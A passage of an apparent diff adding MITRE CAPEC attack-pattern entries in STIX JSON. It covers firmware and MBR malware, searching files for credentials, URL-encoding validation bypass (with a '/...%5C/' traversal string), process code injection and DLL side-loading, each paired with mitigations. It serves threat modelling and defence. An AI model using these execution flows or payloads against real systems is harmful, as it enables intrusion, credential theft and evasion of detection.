  1. Optional: Create Payload: If not using an already existing payload, the adversary creates their own to be executed at defined intervals and upon system boot processes. This payload may then be tested on the target system or a test system to confirm its functionality.

Exploit

  1. Insert Firmware Altering Malware: Once a vulnerable component has been identified, the adversary leverages known malware tools to infect the component's firmware and drop the payload within the component's MBR. This allows the adversary to maintain persistence on the target and execute the payload without being detected.

  2. Techniques
    The adversary inserts the firmware altering malware on the target component, via the use of known malware tools.
    [Physical Access Vector] The adversary then sends the component to its original intended destination, where it will be installed onto a victim system.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the target component's firmware", + "Advanced knowledge about Master Boot Records (MBR)", + "Advanced knowledge about tools used to insert firmware altering malware.", + "Advanced knowledge about component shipments to the target organization." + ], + "x_capec_resources_required": [ + "Manufacturer source code for hardware components.", + "Malware tools used to insert malware and payload onto target component.", + "Either remote or physical access to the target component." + ], + "x_capec_skills_required": { + "High": "Ability to intercept components in transit.", + "Low": "Ability to leverage known malware tools to infect target system and insert firmware altering malware/payload", + "Medium": "Ability to create malicious payload to be executed from MBR." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage hardware components known to not be susceptible to these types of attacks.", + "id": "course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-638-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6dea11a-edca-4ae2-903f-37ba52f94b7d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement hardware RAID infrastructure.", + "id": "course-of-action--e992e312-e11f-4f4a-8e35-0f0e3178301e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-638-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48c6816a-fb7e-4d07-bd6d-26b9d0326f98", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e992e312-e11f-4f4a-8e35-0f0e3178301e", + "spec_version": "2.1", + "target_ref": "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains unauthorized information due to improperly protected files. 
If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-639", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/639.html" + }, + { + "external_id": "CWE-552", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/552.html" + }, + { + "description": "Data from Network Shared Drive", + "external_id": "T1039", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1039" + }, + { + "description": "Unsecured Credentials: Credentials in Files", + "external_id": "T1552.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/001" + }, + { + "description": "Unsecured Credentials: Bash History", + "external_id": "T1552.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/003" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "Unsecured Credentials: Group Policy Preferences", + "external_id": "T1552.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/006" + } + ], + "id": "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Probe System Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries may search local file systems and remote 
file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.", + "Adversaries may search network shares on computers they have compromised to find files of interest." + ], + "x_capec_prerequisites": [ + "An adversary has access to the file system of a system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify that files have proper access controls set, and reduce the storage of sensitive information to only what is necessary.", + "id": "course-of-action--f7009ea8-ba2d-4cdb-86fe-352bd35ae5ff", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-639-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--89b16bf7-ab18-4a61-a200-04e7a496d723", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7009ea8-ba2d-4cdb-86fe-352bd35ae5ff", + "spec_version": "2.1", + "target_ref": "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL combined with the encoding of the slash characters. 
An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.", + "external_references": [ + { + "external_id": "CAPEC-64", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/64.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes and URL Encoding Combined to Bypass Validation Logic", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An attacker could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker accesses the server using a specific URL.

Experiment

  1. The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly.

Exploit

  1. The attacker crafts a malicious URL string request and sends it to the server.

  2. The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An attacker can try special characters in the URL and bypass the URL validation.", + "Medium": "The attacker may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e5df63e2-b26c-43a9-b8db-2987556afde6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4d3b43e0-c4ff-4ab4-abd0-67d7f2037409", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6dd37d7b-5f87-4f59-b359-666ea8c64721", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + 
], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6ea81ef-0f17-4947-9257-d78e4c27418e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--14d09444-d3f4-4b5d-bd9c-ba056327a444", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78a37ef6-634a-4ba7-95e4-375cdbab4d64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, 
+ { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--95070cd8-654a-4ca1-bbdb-e0d859a8c051", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "spec_version": "2.1", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary takes advantage of a bug in an application failing to verify the integrity of the running process to execute arbitrary code in the address space of a separate live process. The adversary could use running code in the context of another process to try to access process's memory, system/network resources, etc. The goal of this attack is to evade detection defenses and escalate privileges by masking the malicious code under an existing legitimate process. 
Examples of approaches include but not limited to: dynamic-link library (DLL) injection, portable executable injection, thread execution hijacking, ptrace system calls, VDSO hijacking, function hooking, reflective code loading, and more.", + "external_references": [ + { + "external_id": "CAPEC-640", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/640.html" + }, + { + "external_id": "CWE-114", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/114.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Hijack Execution Flow: Dynamic Linker Hijacking", + "external_id": "T1574.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/006" + }, + { + "description": "Hijack Execution Flow: KernelCallbackTable", + "external_id": "T1574.013", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/013" + }, + { + "description": "Reflective Code Loading", + "external_id": "T1620", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1620" + } + ], + "id": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Inclusion of Code in Existing Process", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Execute Unauthorized Commands", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Read Data" + ] + }, + 
"x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target process: The adversary determines a process with sufficient privileges that they wish to include code into.

  2. Techniques
    On Windows, use the process explorer's security tab to see if a process is running with administror privileges.
    On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user.

Experiment

  1. Attempt to include simple code with known output: The adversary attempts to include very simple code into the existing process to determine if the code inclusion worked. The code will differ based on the approach used to include code into an existing process.

Exploit

  1. Include arbitrary code into existing process: Once an adversary has determined that including code into the existing process is possible, they will include code for a targeted purpose, such as accessing that process's memory.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The targeted application fails to verify the integrity of the running process that allows an adversary to execute arbitrary code." + ], + "x_capec_skills_required": { + "High": "Knowledge of how to load malicious code into the memory space of a running process, as well as the ability to have the running process execute this code. For example, with DLL injection, the adversary must know how to load a DLL into the memory space of another running process, and cause this process to execute the code inside of the DLL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown or malicious software from loading through using an allowlist policy.", + "id": "course-of-action--9a551de1-20d0-49ee-b6f2-36ad8f61c8e5", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65e58781-40ea-404e-93cf-151d351ad305", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a551de1-20d0-49ee-b6f2-36ad8f61c8e5", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly restrict the location of the software being 
used.", + "id": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--85d27ab2-ecd4-456d-b89a-b7c4e35486df", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage security kernel modules providing advanced access control and process restrictions like SELinux.", + "id": "course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4f55ef67-7b67-4bc1-970e-dd7c277df922", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and similar for Windows.", + "id": "course-of-action--850b6838-1e26-4f64-8405-94d6c0354c1a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4b00d13c-f642-4b89-8b0b-4f4bec45d3e4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--850b6838-1e26-4f64-8405-94d6c0354c1a", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like ptrace system call, use of LD_PRELOAD environment variable, dlfcn dynamic linking API calls, and similar for Linux.", + "id": "course-of-action--59902713-d383-4d5a-9f7e-cfabd2804272", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9fae2dbb-a5ef-4e93-a719-15d38a7d1a44", + "modified": "2023-01-24T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59902713-d383-4d5a-9f7e-cfabd2804272", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like SetWindowsHookEx and SetWinEventHook which install hook procedures for Windows.", + "id": "course-of-action--5c78933b-9c6a-4046-97df-7a1648deff60", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--61327995-a6d3-4961-9d09-10e051ae76d1", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c78933b-9c6a-4046-97df-7a1648deff60", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor processes and command-line arguments for unknown behavior related to code injection.", + "id": "course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + 
"x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc1ad6dd-6038-4e55-89dd-eade5373a2f3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab", + "spec_version": "2.1", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary places a malicious version of a Dynamic-Link Library (DLL) in the Windows Side-by-Side (WinSxS) directory to trick the operating system into loading this malicious DLL instead of a legitimate DLL. Programs specify the location of the DLLs to load via the use of WinSxS manifests or DLL redirection and if they aren't used then Windows searches in a predefined set of directories to locate the file. 
If the applications improperly specify a required DLL or WinSxS manifests aren't explicit about the characteristics of the DLL to be loaded, they can be vulnerable to side-loading.", + "external_references": [ + { + "external_id": "CAPEC-641", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/641.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "Hijack Execution Flow:DLL Side-Loading", + "external_id": "T1574.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/002" + }, + { + "description": "Stewart A., DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry, FireEye", + "external_id": "REF-501", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + } + ], + "id": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DLL Side-Loading", + 